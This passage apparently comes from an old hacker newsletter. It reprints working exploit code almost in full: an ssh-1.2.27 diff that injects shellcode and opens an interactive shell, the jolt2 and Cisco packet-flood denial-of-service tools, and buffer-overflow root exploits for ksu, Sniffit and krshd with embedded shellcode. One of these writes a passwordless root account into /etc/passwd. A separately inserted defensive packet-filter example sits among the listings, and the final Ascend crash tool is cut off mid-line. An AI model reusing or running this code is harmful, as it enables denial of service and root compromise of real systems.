+ key._mp_d[3]=JUMP_TO_MY_KEY+80; + */ + + myfakeKey.bits = 1182; /* Tamanio de la clave */ + myfakeKey.n._mp_alloc = 33; + myfakeKey.n._mp_size = 32; + myfakeKey.n._mp_d = (unsigned long int *)(exp_offset+184); + + myfakeKey.e._mp_alloc = 1; + myfakeKey.e._mp_size = 1; + myfakeKey.e._mp_d = (unsigned long int *)(exp_offset+316); + + myfakeKey.d._mp_alloc = 1; + myfakeKey.d._mp_size = 1; + myfakeKey.d._mp_d = (unsigned long int *)(exp_offset+25); + + myfakeKey.u._mp_alloc = 17; + myfakeKey.u._mp_size = 16; + myfakeKey.u._mp_d = (unsigned long int *)(exp_offset+460); + + myfakeKey.p._mp_alloc = 17; + myfakeKey.p._mp_size = 16; + myfakeKey.p._mp_d = (unsigned long int *)(exp_offset+392); + + myfakeKey.q._mp_alloc = 17; + myfakeKey.q._mp_size = 16; + myfakeKey.q._mp_d = (unsigned long int *)(exp_offset+324); + + #endif + /* Send the encrypted encryption key. */ packet_put_mp_int(&key); *************** *** 1571,1579 **** --- 1639,1686 ---- packet_put_int(SSH_PROTOFLAG_SCREEN_NUMBER | SSH_PROTOFLAG_HOST_IN_FWD_OPEN); /* Send the packet now. 
*/ + #ifdef SSH_EXPLOIT + packet_put_string("BETO",4); + packet_put_string((char *)&myfakeKey,sizeof(myfakeKey)); + packet_put_string(shell_code, shell_code_len); + packet_put_string((char *)myPrivateKey.n._mp_d,myPrivateKey.n._mp_size*4); + packet_put_string((char *)myPrivateKey.e._mp_d,myPrivateKey.e._mp_size*4); + packet_put_string((char *)myPrivateKey.q._mp_d,myPrivateKey.q._mp_size*4); + packet_put_string((char *)myPrivateKey.p._mp_d,myPrivateKey.p._mp_size*4); + packet_put_string((char *)myPrivateKey.u._mp_d,myPrivateKey.u._mp_size*4); + #endif packet_send(); packet_write_wait(); + #ifdef SSH_EXPLOIT + usleep(10); + first = 1; + i = write(packet_get_connection_in(),"id\n",3); + if ( getpeername(packet_get_connection_in(),(struct sockaddr *)&sin, &sin_len) == -1) + return; + + while (1) { + FD_ZERO(&rfds); + FD_SET(packet_get_connection_in(),&rfds); + FD_SET(STDIN_FILENO,&rfds); + if ( (retval = select(packet_get_connection_in()+1,&rfds,NULL,NULL,NULL)) < 0 ) + return; + if (FD_ISSET(STDIN_FILENO,&rfds)) { + i=read(STDIN_FILENO,buf,sizeof(buf)); + write(packet_get_connection_out(),buf,i); + } else if (FD_ISSET(packet_get_connection_in(),&rfds)) { + i=read(packet_get_connection_in(),buf,sizeof(buf)); + if ( first ) + if ( strncmp(buf,"uid",3) ) + return; + else { + fprintf(stdout,"Got it!\n"); + first = 0; + } + write(STDOUT_FILENO,buf,i); + } + } + #endif /* Destroy the session key integer and the public keys since we no longer need them. */ mpz_clear(&key); *************** *** 1583,1588 **** --- 1690,1697 ---- debug("Sent encrypted session key."); /* Set the encryption key. 
*/ + packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH+120, + options->cipher, 1); packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH, options->cipher, 1); Common subdirectories: ssh-1.2.27/zlib-1.0.4 and ssh-1.2.27-exploit/zlib-1.0.4 @HWA 240.0 [IND] '0-day' jolt2.c poc code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WinSec mailing list -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Here is some proof of concept code for the Jolt2 DoS reported by BindView Razor Team (http://razor.bindview.com). Note, this code was not created by me, I am simply passing it on to the mailing list. Send all questions/problems to the author of the code, phonix@moocow.org Regards; Steve Manzuik Moderator - --------------snip---------------- /* * File: jolt2.c * Author: Phonix * Date: 23-May-00 * * Description: This is the proof-of-concept code for the * Windows denial-of-serice attack described by * the Razor team (NTBugtraq, 19-May-00) * (MS00-029). This code causes cpu utilization * to go to 100%. * * Tested against: Win98; NT4/SP5,6; Win2K * * Written for: My Linux box. YMMV. Deal with it. * * Thanks: This is standard code. Ripped from lots of places. * Insert your name here if you think you wrote some of * it. It's a trivial exploit, so I won't take credit * for anything except putting this file together. 
*/ #include #include #include #include #include #include #include #include #include #include #include struct _pkt { struct iphdr ip; union { struct icmphdr icmp; struct udphdr udp; } proto; char data; } pkt; int icmplen = sizeof(struct icmphdr), udplen = sizeof(struct udphdr), iplen = sizeof(struct iphdr), spf_sck; void usage(char *pname) { fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", pname); fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n"); exit(0); } u_long host_to_ip(char *host_name) { static u_long ip_bytes; struct hostent *res; res = gethostbyname(host_name); if (res == NULL) return (0); memcpy(&ip_bytes, res->h_addr, res->h_length); return (ip_bytes); } void quit(char *reason) { perror(reason); close(spf_sck); exit(-1); } int do_frags (int sck, u_long src_addr, u_long dst_addr, int port) { int bs, psize; unsigned long x; struct sockaddr_in to; to.sin_family = AF_INET; to.sin_port = 1235; to.sin_addr.s_addr = dst_addr; if (port) psize = iplen + udplen + 1; else psize = iplen + icmplen + 1; memset(&pkt, 0, psize); pkt.ip.version = 4; pkt.ip.ihl = 5; pkt.ip.tot_len = htons(iplen + icmplen) + 40; pkt.ip.id = htons(0x455); pkt.ip.ttl = 255; pkt.ip.protocol = (port ? 
IPPROTO_UDP : IPPROTO_ICMP); pkt.ip.saddr = src_addr; pkt.ip.daddr = dst_addr; pkt.ip.frag_off = htons (8190); if (port) { pkt.proto.udp.source = htons(port|1235); pkt.proto.udp.dest = htons(port); pkt.proto.udp.len = htons(9); pkt.data = 'a'; } else { pkt.proto.icmp.type = ICMP_ECHO; pkt.proto.icmp.code = 0; pkt.proto.icmp.checksum = 0; } while (1) { bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); } return bs; } int main(int argc, char *argv[]) { u_long src_addr, dst_addr; int i, bs=1, port=0; char hostname[32]; if (argc < 2) usage (argv[0]); gethostname (hostname, 32); src_addr = host_to_ip(hostname); while ((i = getopt (argc, argv, "s:p:h")) != EOF) { switch (i) { case 's': dst_addr = host_to_ip(optarg); if (!dst_addr) quit("Bad source address given."); break; case 'p': port = atoi(optarg); if ((port <=0) || (port > 65535)) quit ("Invalid port number given."); break; case 'h': default: usage (argv[0]); } } dst_addr = host_to_ip(argv[argc-1]); if (!dst_addr) quit("Bad destination address given."); spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (!spf_sck) quit("socket()"); if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs, sizeof(bs)) < 0) quit("IP_HDRINCL"); do_frags (spf_sck, src_addr, dst_addr, port); } -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.3 for non-commercial use iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek IAkI+Hv0ul66TxRmIJP1LqRH =sSSM -----END PGP SIGNATURE----- _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 241.0 [IND] cisco remote dos attack. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #include #include #include #include #include #include #include #include #include #include #include #include unsigned short compute_tcp_checksum(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr) { unsigned long sum; __asm__(" addl %%ecx, %%ebx adcl %%edx, %%ebx adcl $0, %%ebx " : "=b"(sum) : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256) : "bx", "cx", "dx" ); __asm__(" movl %%ecx, %%edx cld cmpl $32, %%ecx jb 2f shrl $5, %%ecx clc 1: lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx loop 1b adcl $0, %%ebx movl %%edx, %%ecx 2: andl $28, %%ecx je 4f shrl $2, %%ecx clc 3: lodsl adcl %%eax, %%ebx loop 3b adcl $0, %%ebx 4: movl $0, %%eax testw $2, %%dx je 5f lodsw addl %%eax, %%ebx adcl $0, %%ebx movw $0, %%ax 5: test $1, %%edx je 6f lodsb addl %%eax, %%ebx adcl $0, %%ebx 6: movl %%ebx, %%eax shrl $16, %%eax addw %%ax, %%bx adcw $0, %%bx " : "=b"(sum) : "0"(sum), "c"(len), "S"(th) : "ax", "bx", "cx", "dx", "si" ); return((~sum) & 0xffff); } #define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) ) #define tcp_offset ( sizeof(struct iphdr) ) #define err(x) { fprintf(stderr, x); exit(1); } #define errors(x, y) { fprintf(stderr, x, y); exit(1); } struct iphdr temp_ip; int temp_socket = 0; u_short ip_checksum (u_short * buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } void fixhost (struct sockaddr_in *addr, char *hostname) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *) addr; (void) bzero ((char *) address, sizeof (struct sockaddr_in)); address->sin_family = AF_INET; address->sin_addr.s_addr = inet_addr (hostname); if ((int) address->sin_addr.s_addr == -1) { host = gethostbyname (hostname); if (host) { bcopy 
(host->h_addr, (char *) &address->sin_addr, host->h_length); } else { puts ("Couldn't resolve address!!!"); exit (-1); } } } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } unsigned short lookup_port (p) char *p; { int i; struct servent *s; if ((i = atoi (p)) == 0) { if ((s = getservbyname (p, "tcp")) == NULL) errors ("Unknown port %s\n", p); i = ntohs (s->s_port); } return ((unsigned short) i); } void spoof_packet (struct sockaddr_in local, int fromport, \ struct sockaddr_in remote, int toport, ulong sequence, \ int sock, u_char theflag, ulong acknum, \ char *packdata, int datalen) { char *packet; int tempint; if (datalen > 0) datalen++; packet = (char *) malloc (psize + datalen); tempint = toport; toport = fromport; fromport = tempint; { struct tcphdr *fake_tcp; fake_tcp = (struct tcphdr *) (packet + tcp_offset); fake_tcp->th_dport = htons (fromport); fake_tcp->th_sport = htons (toport); fake_tcp->th_flags = theflag; fake_tcp->th_seq = random (); fake_tcp->th_ack = random (); /* this is what really matters, however i randomize everything else to prevent simple rule based filters */ fake_tcp->th_off = random (); fake_tcp->th_win = random (); fake_tcp->th_urp = random (); } if (datalen > 0) { char *tempbuf; tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr)); for (tempint = 0; tempint < datalen - 1; tempint++) { *tempbuf = *packdata; *tempbuf++; *packdata++; } *tempbuf = '\r'; } { struct iphdr *real_ip; real_ip = (struct iphdr *) packet; real_ip->version = 4; real_ip->ihl = 5; real_ip->tot_len = htons (psize + datalen); real_ip->tos = 0; real_ip->ttl = 64; real_ip->protocol = 6; real_ip->check = 0; real_ip->id = 10786; real_ip->frag_off = 0; bcopy ((char *) &local.sin_addr, &real_ip->daddr, 
sizeof (real_ip->daddr)); bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr)); temp_ip.saddr = htonl (ntohl (real_ip->daddr)); real_ip->daddr = htonl (ntohl (real_ip->saddr)); real_ip->saddr = temp_ip.saddr; real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1); { struct tcphdr *another_tcp; another_tcp = (struct tcphdr *) (packet + tcp_offset); another_tcp->th_sum = 0; another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen, real_ip->saddr, real_ip->daddr); } } { int result; sock = (int) temp_socket; result = sendto (sock, packet, psize + datalen, 0, (struct sockaddr *) &remote, sizeof (remote)); } free (packet); } void main (argc, argv) int argc; char **argv; { unsigned int daddr; unsigned short dport; struct sockaddr_in sin; int s, i; struct sockaddr_in local, remote; u_long start_seq = 4935835 + getpid (); if (argc != 3) errors ("Usage: %s \n\nDest port of 23n", argv[0]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(daddr = lookup (argv[1]))) err ("Unable to lookup destination address.\n"); dport = lookup_port (argv[2]); sin.sin_family = AF_INET; sin.sin_addr.s_addr = daddr; sin.sin_port = dport; fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]); fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]); /* 500 seems to be enough to kill it */ for (i = 0; i < 500; i++) { start_seq++; local.sin_addr.s_addr = random (); spoof_packet (local, random (), remote, dport, start_seq, (int) s, TH_SYN | TH_RST | TH_ACK, 0, NULL, 0); } } /* www.hack.co.za [22 May]*/ @HWA 242.0 [IND] linux local misc overflow by jim paris. 
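Added example (not part of the original issue or of any listing in it): a receive-side C sanity filter for the three malformed inputs built by the packet listings in sections 237.0, 240.0 and 241.0. It rejects an IP option whose length byte is 0 (the `0x44000001` option word), the same tail fragment (offset 8190, MF clear) repeated over and over, and a TCP segment that carries SYN and RST together or an out-of-range data offset. All function names, the fixed-size fragment table, the threshold of 8 repeats and the sample packets (documentation addresses, zero checksums) are assumptions constructed for illustration.

```c
/* Added example, not from the original listings; all names are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { PKT_OK, PKT_BAD_HEADER, PKT_BAD_IP_OPTION, PKT_FRAG_REPEAT,
               PKT_BAD_TCP_FLAGS, PKT_BAD_TCP_OFFSET };

#define FRAG_SLOTS        64
#define FRAG_REPEAT_LIMIT 8   /* assumed threshold; tune against real traffic */

struct frag_key { uint32_t src, dst; uint16_t id, off; uint8_t proto; };
static struct { struct frag_key k; unsigned count; } frag_table[FRAG_SLOTS];

void reset_fragment_table(void) { memset(frag_table, 0, sizeof frag_table); }

/* Walk the IP options area. Every option except EOL (0) and NOP (1) is
 * type/length/value; a length below 2 or past the header end is rejected,
 * so the walker always advances and never reads outside the header. */
int ip_options_valid(const uint8_t *opt, size_t len)
{
    size_t i = 0;
    while (i < len) {
        if (opt[i] == 0) return 1;              /* End of Option List */
        if (opt[i] == 1) { i++; continue; }     /* No-Operation */
        if (i + 1 >= len) return 0;             /* no room for a length byte */
        if (opt[i + 1] < 2 || i + opt[i + 1] > len) return 0;
        i += opt[i + 1];
    }
    return 1;
}

/* Count sightings of one (src, dst, proto, id, offset) fragment.
 * Toy table: one entry per slot and no expiry timer. */
static unsigned note_fragment(const uint8_t *ip, uint16_t off)
{
    struct frag_key k;
    memset(&k, 0, sizeof k);                    /* zero padding for memcmp */
    memcpy(&k.src, ip + 12, 4);
    memcpy(&k.dst, ip + 16, 4);
    k.id = (uint16_t)(ip[4] << 8 | ip[5]);
    k.off = off;
    k.proto = ip[9];
    unsigned slot = (k.src ^ k.dst ^ k.id ^ k.off ^ k.proto) % FRAG_SLOTS;
    if (frag_table[slot].count && !memcmp(&frag_table[slot].k, &k, sizeof k))
        return ++frag_table[slot].count;
    memcpy(&frag_table[slot].k, &k, sizeof k);
    frag_table[slot].count = 1;
    return 1;
}

enum verdict inspect_ipv4(const uint8_t *p, size_t len)
{
    if (len < 20 || (p[0] >> 4) != 4) return PKT_BAD_HEADER;
    size_t ihl = (size_t)(p[0] & 0x0f) * 4;
    if (ihl < 20 || ihl > len) return PKT_BAD_HEADER;
    if (!ip_options_valid(p + 20, ihl - 20)) return PKT_BAD_IP_OPTION;
    uint16_t frag = (uint16_t)(p[6] << 8 | p[7]);
    uint16_t off = frag & 0x1fff;               /* offset in 8-byte units */
    if (off != 0 || (frag & 0x2000)) {          /* any fragment */
        if (note_fragment(p, off) > FRAG_REPEAT_LIMIT) return PKT_FRAG_REPEAT;
        if (off != 0) return PKT_OK;            /* no transport header here */
    }
    if (p[9] == 6) {                            /* TCP */
        if (len < ihl + 20) return PKT_BAD_HEADER;
        const uint8_t *t = p + ihl;
        size_t doff = (size_t)(t[12] >> 4) * 4;
        if ((t[13] & 0x02) && (t[13] & 0x04)) return PKT_BAD_TCP_FLAGS;
        if (doff < 20 || ihl + doff > len) return PKT_BAD_TCP_OFFSET;
    }
    return PKT_OK;
}

/* Constructed samples: documentation addresses, checksums left at zero. */
static const uint8_t opt_len0_pkt[44] = {       /* option type 0x44, length 0 */
    0x46,0,0,0x2c, 0,1,0,0, 0x40,6,0,0, 192,0,2,1, 198,51,100,2,
    0x44,0x00,0x00,0x01,
    0,0x50,0x12,0x34, 0,0,0,0, 0,0,0,0, 0x50,0x18,0x20,0, 0,0,0,0 };
static const uint8_t tail_frag_pkt[29] = {      /* offset 8190, MF clear */
    0x45,0,0,0x1d, 0x04,0x55,0x1f,0xfe, 0xff,1,0,0, 192,0,2,1, 198,51,100,2,
    8,0,0,0, 0,0,0,0, 'a' };
static const uint8_t syn_rst_pkt[40] = {        /* flags SYN|RST|ACK = 0x16 */
    0x45,0,0,0x28, 0,2,0,0, 0x40,6,0,0, 192,0,2,1, 198,51,100,2,
    4,0,0,0x17, 0,0,0,1, 0,0,0,2, 0x50,0x16,0x20,0, 0,0,0,0 };

int main(void)
{
    enum verdict v = PKT_OK;
    reset_fragment_table();
    printf("zero-length option: %d\n", inspect_ipv4(opt_len0_pkt, sizeof opt_len0_pkt));
    printf("SYN+RST segment:    %d\n", inspect_ipv4(syn_rst_pkt, sizeof syn_rst_pkt));
    for (int i = 0; i <= FRAG_REPEAT_LIMIT; i++)
        v = inspect_ipv4(tail_frag_pkt, sizeof tail_frag_pkt);
    printf("repeated fragment:  %d\n", v);
    return 0;
}
```

A production filter would also expire fragment entries on a timer and track whether a first fragment ever arrives; the table here only counts repeats.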
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ jim@jtan.com /******** * ksux.c -- ksu exploit * written January 26, 2000 * Jim Paris * * This program exploits a vulnerability in the 'ksu' utility included * with the MIT Kerberos distribution. Versions prior to 1.1.1 are * vulnerable. * * This exploit is for Linux/x86 with Kerberos version 1.0. Exploits * for other operating systems and versions of Kerberos should also work. * * Since krb5_parse_name will reject input with an @ or /, this shellcode * execs 'sh' instead of '/bin/sh'. As a result, a copy of 'sh' must * reside in the current directory for the exploit to work. * */ #include #include int get_esp(void) { __asm__("movl %esp,%eax"); } char *shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x02\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xffsh"; #define LEN 0x300 #define RET_OFFSET 0x240 #define JMP_OFFSET 0x240 #define CODE_OFFSET 0x100 int main(int argc, char *argv[]) { int esp=get_esp(); int i,j; char b[LEN]; memset(b,0x90,LEN); memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode)); *(int *)&b[RET_OFFSET]=esp+JMP_OFFSET; b[RET_OFFSET+4]=0; execlp("ksu","ksu","-n",b,NULL); } /* www.hack.co.za [22 May]*/ @HWA 243.0 [IND] linux remote misc overflow by noir. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ noir@gsu.linux.org.tr /* Sniffit 0.3.7Beta Remote Exploit sniffit has to be running (-L mail) flag set for this to work. bug discovery by http://www.s0ftpj.org tested on RedHat 6.0 this will get you a root line in /etc/passwd -->snip... # tail -1 /etc/passwd n0ir::0:0:mr. noir:/:/bin/sh <--end... 
greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux exploit code by noir@gsu.linux.org.tr | noir@olympos.org http://www.olympos.org [RET]{NOP}[shellcode] 3 May 2000 */ #include #include #include #include #include #include #include #include #include unsigned char shellcode[]= { 0xeb, 0x03, 0x5f, 0xeb, 0x05, 0xe8, 0xf8, 0xff, 0xff, 0xff, 0x31, 0xdb, 0xb3, 0x35, 0x01, 0xfb, 0x30, 0xe4, 0x88, 0x63, 0x0b, 0x31, 0xc9, 0x66, 0xb9, 0x01, 0x04, 0x31, 0xd2, 0x66, 0xba, 0xa4, 0x01, 0x31, 0xc0, 0xb0, 0x05, 0xcd, 0x80, 0x89, 0xc3, 0x31, 0xc9, 0xb1, 0x5b, 0x01, 0xf9, 0x31, 0xd2, 0xb2, 0x1d, 0x31, 0xc0, 0xb0, 0x04, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0xcd, 0x80, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x01, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x6e, 0x30, 0x69, 0x72, 0x3a, 0x3a, 0x30, 0x3a, 0x30, 0x3a, 0x6d, 0x72, 0x2e, 0x20, 0x6e, 0x6f, 0x69, 0x72, 0x3a, 0x2f, 0x3a, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20 }; int resolv(char *hname, struct in_addr *addr); /*#define RET 0xaabbccdd marker lvalue*/ #define RET 0xbfff5ba3 /*RedHat 6.0 (hedwig)*/ #define NOP 0x90 int main(int argc, char *argv[]) { int fd; int i, l; int align = 11; unsigned long eip = RET, addr = 0, offset = 0; unsigned char ovf[812]; struct sockaddr_in servaddr; if (argc < 2){ fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n"); fprintf(stderr,"Olympos Security Team http://www.olympos.org\n"); fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n"); fprintf(stderr,"\nUsage: %s [offset]\n\n",argv[0]); exit(0); } if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){ perror("socket"); exit(-1); } bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_port = htons(25); if(!resolv(argv[1], &servaddr.sin_addr)){ 
herror("gethostbyname"); exit(-1); } if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){ perror("connect"); exit(-1); } printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n"); printf("Olympos Security Team http://www.olympos.org\n"); printf("bug discovery by FuSyS of s0ftpj.org\n"); if(argv[2]) offset = atoi(argv[2]); addr = eip + offset; memset(ovf, NOP, sizeof(ovf)); for( i = 0 ; i < align; i++) ovf[i] = 0x41; for( i = align; i < strlen(ovf) ; i+=4) *((long *) &ovf[i]) = addr; for( i = 230; i < strlen(ovf); i++) ovf[i] = 0x90; for( i = 603, l = 0; l < strlen(shellcode); i++, l++) ovf[i] = shellcode[l]; printf("eip: 0x%lx\n", addr); memcpy(ovf, "mail from:",10); write(fd, ovf, strlen(ovf)); write(fd, "\r\n\n", 3); return 0; } int resolv(char *hname, struct in_addr *addr) { struct hostent *hp; if(inet_aton(hname, addr)) return 1; if ( (hp = gethostbyname(hname)) == NULL) return 0; memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr)); return 1; } /* www.hack.co.za [22 May]*/ @HWA 244.0 [IND] linux remote misc overflow by jim paris. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ jim@jtan.com /******** * kshux.c -- krshd remote exploit * written April 8, 2000 * Jim Paris * * This program exploits a vulnerability in the 'krshd' daemon included * with the MIT Kerberos distribution. All versions are apparently * vulnerable. * * This exploit is for Linux/x86 with Kerberos version 1.0, but you'll * probably need a fair bit of coaxing to get it to work. * * And yes, it's ugly. 
I need to accept an incoming connection from the * remote server, handle the fact that the overflow goes through two * functions and a toupper(), make sure that certain overwritten pointers * on the remote host's stack are set to valid values so that a strlen * call in krb425_conv_principal() doesn't cause a segfault before we * return into the shellcode, adjust the offset depending on the remote * hostname to properly align things, etc etc. As a result, you'll * probably have a hard time getting this to work -- it took a lot of * hacking and hardcoded numbers to get this to work against my test * systems. * */ #include #include #include #include #include #define LEN 1200 #define OFFSET 0 #define ADDR 0xbfffd7a4 char *sc="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; void get_incoming(int r) { int s, l=1; struct sockaddr_in sa, ra; bzero(&sa,sizeof(sa)); sa.sin_family=AF_INET; sa.sin_addr.s_addr=htonl(INADDR_ANY); sa.sin_port=htons(16474); if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) perror("socket"),exit(1); setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&l,sizeof(l)); if(bind(s,(struct sockaddr *)&sa,sizeof(sa))<0) perror("bind"),exit(1); if(listen(s,1)) perror("listen"),exit(1); write(r,"16474",6); if(accept(s,&sa,&l)<0) perror("accept"),exit(1); } int con_outgoing(char *h) { int s, i; struct sockaddr_in a; struct hostent *e; if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) perror("socket"),exit(1); if((i=inet_addr(h))==INADDR_NONE) { if((e=gethostbyname(h))==NULL) perror("gethostbyname"),exit(1); bcopy(e->h_addr,&i,sizeof(i)); } bzero(&a,sizeof(a)); a.sin_family=AF_INET; a.sin_addr.s_addr=i; a.sin_port=htons(544); if(connect(s,(struct sockaddr *)&a,sizeof(a))<0) perror("connect"),exit(1); return s; } void bus(int s) { int i; fd_set r; char b[1024]; for(;;) { FD_ZERO(&r); FD_SET(0,&r); FD_SET(s,&r); if((i=select(s+1,&r,NULL,NULL,NULL))==-1) 
perror("select"),exit(1); if(i==0) fprintf(stderr,"closed\n"),exit(0); if(FD_ISSET(s,&r)) { if((i=read(s,b,sizeof(b)))<1) fprintf(stderr,"closed\n"),exit(0); write(1,b,i); } if(FD_ISSET(0,&r)) { if((i=read(0,b,sizeof(b)))<1) fprintf(stderr,"closed\n"),exit(0); write(s,b,i); } } } void main(int ac, char *av[]) { int s, i, j, a=ADDR, o=OFFSET; int l, h; char b[LEN]; if(ac<2) { fprintf(stderr,"%s hostname [addr] [offset]\n",*av); exit(1); } a+=(ac>2)?atoi(av[2]):0; o+=(ac>3)?atoi(av[3]):(4-(strlen(av[1])%4)); o%=4; if(o<0) o+=4; l=(ac>4)?atoi(av[4]):-10; h=(ac>5)?atoi(av[5]):10; fprintf(stderr,"addr=%p, offset=%d\n",a,o); if(isupper(((char *)&a)[0]) || isupper(((char *)&a)[1]) || isupper(((char *)&a)[2]) || isupper(((char *)&a)[3])) fprintf(stderr,"error: addr contains uppercase\n"),exit(0); s=con_outgoing(av[1]); get_incoming(s); sprintf(&b[0],"AUTHV0.1blahblah"); *(int *)(b+16)=htonl(LEN); b[20]=4; b[21]=7; b[22]=123; write(s,b,23); for(i=0;i #include #include #include #include #include #include #include #include #include #include #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } /* This magic packet was taken from the Java Configurator */ char ascend_data[] = { 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53}; unsigned short in_cksum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } int 
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; char crashme[500]; int i; ip.ihl = 5; ip.version = 4; ip.tos = rand () % 100;; ip.tot_len = htons (28 + datalen); ip.id = htons (31337 + (rand () % 100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum ((char *) &ip, sizeof (ip)); udp.source = htons (sport); udp.dest = htons (dport); udp.len = htons (8 + datalen); udp.check = (short) 0; memcpy (packet, (char *) &ip, sizeof (ip)); memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); /* Append random garbage to the packet, without this the router will think this is a valid probe packet and reply. */ for (i = 0; i < 500; i++) crashme[i] = rand () % 255; memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, 